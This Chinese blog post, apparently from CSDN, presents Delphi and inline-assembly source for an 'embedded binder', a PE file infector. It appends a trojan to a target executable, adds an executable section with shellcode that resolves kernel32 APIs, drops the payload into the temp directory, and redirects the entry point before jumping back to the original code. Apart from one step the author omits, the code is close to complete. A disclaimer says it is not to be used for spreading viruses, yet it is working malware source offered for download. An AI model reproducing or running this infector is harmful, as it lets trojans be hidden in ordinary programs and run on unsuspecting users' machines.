签入式捆绑

最新推荐文章于 2022-02-25 21:57:21 发布
最新推荐文章于 2022-02-25 21:57:21 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: vcbcbdelphi的window编程 病毒汇编和调试逆向技术加脱壳 文章标签: integer file search image c shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2799250
版权
 【摘要】
上次写到使用附加捆绑文件的方式. 这次介绍使用签入式捆绑
签入式捆绑的原理也很简单,
也是把木马程序附加到程序尾部 然后在原程序里添加一个代码节
用来把木马程序释放出来. 最后将原程序的入口点改成添加节的起始地址
由于这种试会改变原程序的大小,并且和程序运行的环境有关.
所以 .net或其它的虚拟机程序是不能被运行的.
还有一种就是有附加数据的程序  因为改变了文件的大小 如果强行捆绑 有可能会使原程序执行出错.
下面给出捆绑代码(请勿用于病毒传播) Demo下载

【全文】

procedure InfectOneFile(ASrcFileName,ADesFileName: string; const isCheck: Boolean = true);
var
  I: integer;
  F,F1: THandle;
  dReadNum: DWORD;
  DosHeader: TImageDosHeader;
  NTHeader: TImageNtHeaders; {NtHeader}
  NewSectionHeader,SEChea: TImageSectionHeader;
  nOldSectionNo: Integer;{节数目}
 OEP: Integer; {入口点}
 SectionAlign: Integer; {节对齐}
 FileAlign: Integer; {文件对齐}    
  Data: TDatas;
  pShell: PChar;
  nShellLen, nNewImageSize, nNewSizeofCode: Integer;
  jmp: BYTE;
  buf: array[0..$1000] of byte;
  TempPath: string;
  FileSize: Integer;
  label shellend, shell, Search, QUIT,RE;

begin
  TempPath := '';
  F := CreateFile(PChar(ADesFileName), GENERIC_READ or GENERIC_WRITE, 0, nil, OPEN_EXISTING, 0, 0);
  try
    //打开失败退出
    if F = INVALID_HANDLE_VALUE then
    begin
      {$IFDEF DEBUG} AddLog('打开文件失败'+ADesFileName); {$ENDIF}
      Exit;
    end;
    //检查是否PE文件
    ReadFile(F, DosHeader, SizeOf(TImageDosHeader), dReadNum, nil);      
    if not DosHeader.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      {$IFDEF DEBUG} AddLog('不是PE文件'+ADesFileName); {$ENDIF}
      Exit;
    end;
   
    SetFilePointer(F, $30, nil, FILE_BEGIN);
    ReadFile(F, Data, SizeOf(TDatas), dReadNum, nil);
    if Data.ID = $88888888 then  {已经被附加}
    begin
      {$IFDEF DEBUG} AddLog('已经感染'+ADesFileName); {$ENDIF}
      Exit;
    end;
    //读取NTHeader
    SetFilePointer(F, DosHeader._lfanew, nil, FILE_BEGIN);
    ReadFile(F, NTHeader, SizeOf(NTHeader), dReadNum, nil);
    if NTHeader.Signature <> IMAGE_NT_SIGNATURE then Exit;
    if (NTHeader.FileHeader.Characteristics = $10E) and isCheck then
    begin
      {$IFDEF DEBUG} AddLog('.net或其它文件'+ADesFileName); {$ENDIF}
      Exit; //.net 或其它文件 不能附加
    end;

    nOldSectionNo := NTHeader.FileHeader.NumberOfSections;
    OEP := NTHeader.OptionalHeader.AddressOfEntryPoint;
    SectionAlign := NTHeader.OptionalHeader.SectionAlignment;
    FileAlign := NTHeader.OptionalHeader.FileAlignment;

    ZeroMemory(@NewSectionHeader, SizeOf(TImageSectionHeader));
    //读取最后一个节头
    SetFilePointer(F, DosHeader._lfanew+SizeOf(TImageNtHeaders), nil, FILE_BEGIN);
    for i := 0 to nOldSectionNo - 1 do
       ReadFile(F, SEChea, SizeOf(TImageSectionHeader), dReadNum, nil);
    FileSize := GetFileSize(F, nil);  
    if (FileSize <> SEChea.PointerToRawData + SEChea.SizeOfRawData) and isCheck then
    begin  //有附加数据不能附加
      {$IFDEF DEBUG} AddLog('.有附加数据不能感染'+ADesFileName); {$ENDIF}
      Exit;
    end;
    goto shellend;
    asm
    shell:
      pushad
      mov eax, fs:$30  //;PEB的地址
    mov eax, [eax + $0c]
      mov esi, [eax + $1c]
      lodsd
      mov eax, [eax + $08] //;eax就是kernel32.dll的基址
      mov edi, eax //同时保存kernel32.dll的基址到edi
  
    //通过搜索 kernel32.dll的导出表查找GetProcAddress函数的地址
      mov ebp, eax
      mov eax, [ebp + $3c]
      mov edx, [ebp + eax + $78]
      add edx, ebp
      mov ecx, [edx + $18]
      mov ebx, [edx + $20]
      add ebx, ebp
  
      Search:
        dec ecx
        mov esi, [ebx + ecx * 4]

        add esi, ebp
        mov eax, $50746547
        cmp [esi], eax  //比较"PteG"
        jne Search
        mov eax, $41636f72
        cmp [esi + 4], eax
        jne Search
        mov ebx, [edx + $24]
        add ebx, ebp
        mov cx, [ebx + ecx * 2]
        mov ebx, [edx + $1c]
        add ebx, ebp
        mov eax, [ebx + ecx * 4]
        add eax, ebp  //eax保存的就是GetProcAddress的地址  

        //为局部变量分配空间
        push ebp
        sub esp, $50
        mov ebp, esp
       
        mov [ebp + $10], eax //把GetProcAddress的地址保存到ebp + 10中 

        //查找  GlobalAlloc
        push DWORD PTR $636F6C
        push DWORD PTR $6C416C61
        push DWORD PTR $626F6C47
        push esp
        push edi
        call [ebp + $10]
        //mov [ebp + $14], eax //保存GlobalAlloc的地址到ebp + 14h

        push $1000 //分配$1000空间内存
        push GHND
        call eax
        mov [ebp + $4C], eax//保存hMem
        mov eax, [eax]  //
        mov [ebp + $4], eax
        //mov [ebp + $14], eax //保存指针  
        //mov eax, edx        
        mov [eax],DWORD PTR $61657243
        add eax, 4
        mov [eax],DWORD PTR $69466574                
        add eax, 4
        mov [eax],DWORD PTR $41656C
       
      //开始查找CreateFileA的地址, 先构造"CreateFileA/0"
        push [ebp + $4] //压入"CreateFileA/0"的地址
        push edi //edi:kernel32的基址
        call [ebp + $10] //返回值(即CreateFileA的地址)保存在eax中
        mov [ebp + $14], eax //保存CreateFileA的地址到ebp + 14h        
       
        //开始查找ReadFile的地址
        mov eax, [ebp + $4]        
        mov [eax],DWORD PTR $64616552
        add eax, 4
        mov [eax],DWORD PTR $656C6946
        add eax, 4
        mov [eax],DWORD PTR $0
               
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $18], eax //保存ReadFile的地址到ebp + 18h
       
        //查找 WriteFile
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $74697257
        add eax, 4
        mov [eax],DWORD PTR $6C694665
        add eax, 4
        mov [eax],DWORD PTR $65
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $1C], eax //保存WriteFile的地址到ebp + 1Ch
        //查找GetModuleFileNameA
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $4D746547
        add eax, 4
        mov [eax],DWORD PTR $6C75646F
        add eax, 4
        mov [eax],DWORD PTR $6C694665
        add eax, 4
        mov [eax],DWORD PTR $6D614E65
        add eax, 4
        mov [eax],DWORD PTR $4165
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $20], eax //保存GetModuleFileNameA的地址到ebp + 20h
        //查找SetFilePointer
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $46746553
        add eax, 4
        mov [eax],DWORD PTR $50656C69
        add eax, 4
        mov [eax],DWORD PTR $746E696F
        add eax, 4
        mov [eax],DWORD PTR $7265        
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $24], eax
        //查找 GetTempPathA
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $54746547
        add eax, 4
        mov [eax],DWORD PTR $50706D65
        add eax, 4
        mov [eax],DWORD PTR $41687461
        add eax, 4
        mov [eax],DWORD PTR $0
       
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $28], eax

        //查找CloseHandle
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $736F6C43
        add eax, 4
        mov [eax],DWORD PTR $6E614865
        add eax, 4
        mov [eax],DWORD PTR $656C64
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $2C], eax
        //查找WinExec
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $456E6957
        add eax, 4
        mov [eax],DWORD PTR $636578
        push [ebp + $4]
        push edi
        call [ebp + $10]
        mov [ebp + $30], eax 

        //获取文件名
        push $FF
        //lea eax, [ebp + $4]
        push [ebp + $4]
        push DWORD PTR $0
        call [ebp + $20] //GetModuleFileName    

        //打开文件
        push $0
        push $0
        push OPEN_EXISTING
        push $0
        push FILE_SHARE_READ
        push GENERIC_READ 
        push [ebp + $4]
        call [ebp + $14]
        mov [ebp + $34], eax //保存文件句柄
        cmp eax, $FFFFFFFF  //打开失败
        jz QUIT
        //SetFilePointer $30
        push $0
        push $0
        push $30
        push [ebp + $34]
        call [ebp + $24] //SetFilePointer
        //ReadFile ID
        push $0
        mov eax, [ebp + $4]
        push eax
        push $4
        add eax, 4
        push eax
        push [ebp + $34]
        call [ebp + $18] //ReadFile ID
        mov eax, [ebp + $4]
        add eax, 4
        cmp [eax], $88888888
        jnz QUIT
        //ReadFile Offset
        push $0
        mov eax,[ebp + $4]
        push eax
        push $4
        add eax, 4
        push eax //Offset
        push [ebp + $34]
        call [ebp + $18]
       
        //ReadFile  Size
        push $0
        mov eax,[ebp + $4]
        push eax
        push $4
        add eax, 8
        push eax //Size
        push [ebp + $34]
        call [ebp + $18]

        //SetFilePointer OffSet
        push $0
        push $0
        mov eax, [ebp + $4]
        add eax, 4
        push [eax]
        push [ebp + $34]
        call [ebp + $24]

        mov eax,[ebp + $4]
        add eax, $C
        push eax
        push $FF
        call [ebp + $28] //TempPath

        mov edx,[ebp + $4]
        add edx, $C
        add eax, edx         
        mov [eax],DWORD PTR $2E656d69
        add eax, 4
        mov [eax],DWORD PTR $657865
       
        //打开文件
        push $0
        push $0
        push CREATE_ALWAYS
        push $0
        push $0
        push GENERIC_WRITE
        push edx
        call [ebp + $14]  //CreateFile NewFile
        mov [ebp + $44], eax //保存文件句柄
        cmp eax, $FFFFFFFF
        jz QUIT

    RE: //ReadFile
        push $0
        mov eax,[ebp + $4]
        push eax
        push $FF
        add eax, $C
        add eax, $FF
        push eax//Buff
        push [ebp + $34]
        call [ebp + $18] //ReadFile
        //WriteFile
        push $0
        mov eax,[ebp + $4]
        push eax
        push [eax]
        add eax, $C
        add eax, $FF
        push  eax//Buff
        push [ebp + $44]
        call [ebp + $1C]
        mov eax, [ebp + $4]
        cmp [eax], 0
        jnz RE

        push [ebp + $44]
        call [ebp + $2c] //关闭新文件句柄
       
        push [ebp + $34]
        call [ebp + $2c] //关闭文件句柄

        //运行程序
        (这里省略一部分)        
        //释放内存  
        mov eax, [ebp + $4]
        mov [eax],DWORD PTR $626F6C47
        add eax, 4
        mov [eax],DWORD PTR $72466C61
        add eax, 4
        mov [eax],DWORD PTR $6565
        push [ebp + $4]
        push edi
        call [ebp + $10]  //GlobalFree
        push [ebp + $4C]
        call eax
               
    QUIT:  mov esp, ebp
        add esp, $50
        popad
    end;

    shellend:
    asm
      LEA EAX,shell
    MOV pShell,EAX;
    LEA EBX,shellend
     SUB EBX,EAX
     MOV nShellLen,EBX
    end;
    FileSize := GetFileSize(F, nil);
    SetFilePointer(F, SEChea.PointerToRawData + SEChea.SizeOfRawData, nil, FILE_BEGIN);

    if FileSize <> SEChea.PointerToRawData + SEChea.SizeOfRawData then //有附加数据
    begin
      //将附加数据写入临时文件
      TempPath := GetTempDir + '{3B034D2C-A7B4-47D0-BA07-988E9359649D}';
      F1 := CreateFile(PChar(TempPath), GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);
      try
        if F1 = INVALID_HANDLE_VALUE then Exit;
        repeat
           ReadFile(F, buf, sizeOf(buf), dReadNum, nil);
           WriteFile(F1, buf, dReadNum, dReadNum, nil);
        until dReadNum = 0;
      finally
         CloseHandle(F1);
      end;
    end;
    //写入代码
    SetFilePointer(F, SEChea.PointerToRawData + SEChea.SizeOfRawData, nil, FILE_BEGIN);
    //原来的文件没有对齐
    if Align(SEChea.SizeOfRawData, FileAlign) <>  SEChea.SizeOfRawData then
    begin
      jmp := $00;
     for i := 0 to Align(SEChea.SizeOfRawData,FileAlign) - SEChea.SizeOfRawData - 1 do
       WriteFile(F, jmp, 1, dReadNum, nil);
    end;

    WriteFile(F, pShell^, nShellLen, dReadNum, nil);
    //SHELLCODE之后是跳转到原OEP的指令
   NewSectionHeader.VirtualAddress := SEChea.VirtualAddress
                          + Align(SEChea.Misc.VirtualSize,SectionAlign);
   jmp := $E9;
   OEP := OEP - (NewSectionHeader.VirtualAddress + nShellLen) - 5;
   WriteFile(F, jmp, sizeof(jmp), dReadNum, nil);
   WriteFile(F, OEP, sizeof(OEP), dReadNum, nil);
   //将最后增加的数据用0填充至按文件中对齐的大小
    jmp := $00;
    for i:=0 to Align(nShellLen,FileAlign) - nShellLen - 6 do
       WriteFile(F, jmp, 1, dReadNum, nil);
   //新区块中的数据
   Move('.data', NewSectionHeader.Name, 5);
   NewSectionHeader.PointerToRawData := SEChea.PointerToRawData + Align(SEChea.SizeOfRawData, FileAlign);
   NewSectionHeader.Misc.VirtualSize := nShellLen;
   NewSectionHeader.SizeOfRawData := Align(nShellLen, FileAlign);
   NewSectionHeader.Characteristics := $E0000020;//新区块可读可写可执行
   
    SetFilePointer(F, DosHeader._lfanew + SizeOf(TImageNtHeaders) + SizeOf(TImageSectionHeader) * nOldSectionNo, nil, FILE_BEGIN);
   //写入新的块表
   WriteFile(F, NewSectionHeader,SizeOf(TImageSectionHeader),dReadNum, nil);

   nNewImageSize := NTHeader.OptionalHeader.SizeOfImage + Align(nShellLen, SectionAlign);
   nNewSizeofCode := NTHeader.OptionalHeader.SizeOfCode + Align(nShellLen, FileAlign);

   NTHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress := 0;
   NTHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size := 0;
   NTHeader.OptionalHeader.SizeOfCode := nNewSizeofCode;
    NTHeader.OptionalHeader.SizeOfImage := nNewImageSize;
   NTHeader.FileHeader.NumberOfSections := nOldSectionNo + 1;
   NTHeader.OptionalHeader.AddressOfEntryPoint := NewSectionHeader.VirtualAddress;
    //写入更新后的PE头结构
    SetFilePointer(F, DosHeader._lfanew, nil, FILE_BEGIN);
   WriteFile(F, NTHeader ,Sizeof(TImageNTHeaders), dReadNum, nil);

    if TempPath <> '' then  //将附加数据写回来
    begin
      F1 := CreateFile(PChar(TempPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
      try
        if F1 = INVALID_HANDLE_VALUE then Exit;
        SetFilePointer(F, NewSectionHeader.SizeOfRawData + NewSectionHeader.PointerToRawData, nil, FILE_BEGIN);
        repeat
           ReadFile(F1, buf, sizeOf(buf), dReadNum, nil);
           WriteFile(F, buf, dReadNum, dReadNum, nil);
        until dReadNum = 0;
      finally
         CloseHandle(F1);
         DeleteFile(PChar(TempPath));
      end;
    end;
    //写入附加数据
    F1 := CreateFile(PChar(ASrcFileName), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
    try
      if F1 = INVALID_HANDLE_VALUE then
      begin
        {$IFDEF DEBUG} AddLog('打开源文件失败'+ASrcFileName); {$ENDIF}
        Exit;
      end;
      Data.ID := $88888888;
      Data.Offset := NewSectionHeader.SizeOfRawData + NewSectionHeader.PointerToRawData;
      Data.Size := GetFileSize(F1, nil);
      SetFilePointer(F, $30, nil, FILE_BEGIN);
      WriteFile(F, Data, SizeOf(TDatas), dReadNum, nil);
      SetFilePointer(F, 0, nil, FILE_END);
      SetFilePointer(F1, 0, nil, FILE_BEGIN);
      repeat
         ReadFile(F1, buf, sizeOf(buf), dReadNum, nil);
         WriteFile(F, buf, dReadNum, dReadNum, nil);
      until dReadNum = 0;
    finally
       CloseHandle(F1);  
    end;
  finally
    CloseHandle(F);
  end;
  {$IFDEF DEBUG} AddLog(ASrcFileName+'感染成功'+ADesFileName); {$ENDIF}
end;

--------------------------------------------------------------------------------
iiprogram
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PE文件的基本结构-2 NT头
zhangxinrun的专栏
08-24 1234
<br />1 PE文件头(NT文件头)<br />从DOS文件头的_lfanew字段(文件头偏移003ch)得到真正的PE文件头位置[$0000 0100]后,现在来看看它的定义,PE文件头是由IMAGE_NT_HEADERS结构定义的:<br />PImageNtHeaders = ^TImageNtHeaders;<br />_IMAGE_NT_HEADERS = packed record<br />    [$0100]Signature: DWORD;<br />    [$0104]FileH
rollup-plugin-multi-input:捆绑模块化库的插件
05-13
汇总插件多输入 一个汇总插件,用于将模块化库与子目录捆绑在一起。 使用多个入口点。 在条目中使用glob。 在dist文件夹中保留src树结构。 安装 通过npm或yarn进行安装。 npm i -D rollup-plugin-multi-input yarn add rollup-plugin-multi-input 设置 在汇总配置中 import multiInput from 'rollup-plugin-multi-input' ; export default { // use glob in the input input : [ 'src/**/*.js' ] , output : { format : 'esm' , dir : 'dist' } , plugins : [ multiInput (
文件捆绑感染方解密
怪蜀黍专栏
10-26 530
最近在研究病毒木马程序的感染和捆绑。   发现文件困有多种方 我只和大家探讨两种方 一种是附加的方,一种是内嵌   第一种方 就是将木马程序附加在别的程序头部 也就是说 运行的目标程序是木马   然后木马程序将原程序解压出来再运行 听说熊猫烧香的程序用的就是这种方法   这种方有缺点也有优点   优点是:   可以捆绑任何程序   缺点是:   运行时需要把目标程序给
android开发apk捆绑,Android 下 APK 捆绑器的实现
weixin_31764271的博客
05-28 1832
Android 下 APK 捆绑器的实现作者: 海东青利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了类似 Windows 下捆绑器的实现方案。原理与基础对任意的两个 APK 应用程序 A ...
html标签可以嵌套吗,HTML标签的嵌套
weixin_34604756的博客
06-15 2161
随着时间的推移,我们学习html的基础知识有了大概的了解。而我发现,平时在写html文档的时候,发现不太清楚标签之间的嵌套规则,经常是想到什么标签就用那些,然而发现有时的标签嵌套却是错误的。通过网上找资料,了解了html标签的嵌套规则一、HTML 标签包括 块级元素(block)、内联元素(inline)1、块级元素一般用来搭建网站架构、布局、承载内容的元素,如下:address、blockquo...
Android--APK 捆绑器的实现
超宇的博客
04-10 9502
利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这 在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实 现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了 类似 Windows 下捆绑器的实现方案。 原理与基础 对任意的两个 APK 应用程序 A
Android 下 APK 捆绑器的实现
小雷的私人记事本
10-12 1856
Android 下 APK 捆绑器的实现                    作者: 海东青 利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这 在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实 现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了 类似 Windows 下捆绑
排污管道地埋RFID电子标签CK-GT003标识球埋设位置建议
RFID_solution的博客
01-10 2553
地埋ID球形电子标识器内部是一个无源电路,外壳防潮、防酸碱、防腐蚀、耐挤压、能充分抵抗外界环境的剧烈变化。其内置了一片可存储设施相关信息的低频RFID芯片。球型电子标识器采用自水平设计,无论球型标识器以何种角度投入开挖的沟渠,其内部的电磁感应线圈都可以保持水平位置,确保接收效果和探测深度。球形标识器中的防冻液体使其能适用于低至-40℃的极寒环境。
pythondash交互表格_【呆鸟译Py】Python交互数据分析报告框架~Dash介绍
weixin_39942400的博客
12-12 1176
译者序:原文于2017年6月21日发布,时过半载,将这篇既不是教程,也不是新闻的产品发布稿做了一番翻译,为何?只因去年下半年的时候,用R语言的博哥和龙少有Shiny这样的框架可以开发交互整合Web数据分析报告,让我这个成天鼓吹用Python做数据分析的人眼馋不已。当时找了很久,试用了包括Bokeh、mpld3、Highcharts,以及键冬同学基于百度Echarts开发的PyEcharts,但是...
android 进程定,Android 下 APK 捆绑器的实现
weixin_39791152的博客
05-26 416
Android 下 APK 捆绑器的实现作者: 海东青利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了类似 Windows 下捆绑器的实现方案。原理与基础对任意的两个 APK 应用程序 A ...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8841
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3304
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 6400
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1554
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2499
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 4010
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
C语言经典小游戏之----推箱子
嵌入式技术开发
02-25 4590
在进行推箱子的实验中,可以使用对应的API函数来改变对应箱子的颜色,也需要根据,人在移动的过程中,可以通过方向键,并改变对应的颜色,从而实现控制人物的目的。 代码实现如下: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #include<conio.h> int x = 0, y = 0; //存储当前使用的...
关于Dubbo的mock=true降级无法调用降级类ServiceMock的解决方案
weixin_45754452的博客
02-25 1353
问题 消费者使用mock=“true”,想调用TestServiceMock进行服务降级无法调用 原因 我的项目结构如下,首先要知道服务降级代码应该是谁执行的,服务降级是服务消费者也就是controller包处对应的服务执行的,因为我只是测试dubbo怎么使用,所以并没有分多模块,但完全可以把一个包理解为一个模块,再看下面配置文件 为什么可以把一个包当成一个模块呢,因为我把配置文件的scan改成controller包然后启动一个服务器,即消费者,如果把scan改成service则可以启动服务提供者服务器
enspppp链路捆绑
最新发布
04-07
enspppp链路捆绑是一种网络技术,用于将多个物理链路或逻辑链路定在一起,形成一个逻辑上的高带宽链路。通过链路捆绑,可以提高网络的带宽和可靠性,同时还可以实现负载均衡和故障容错。 链路捆绑可以在不同的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值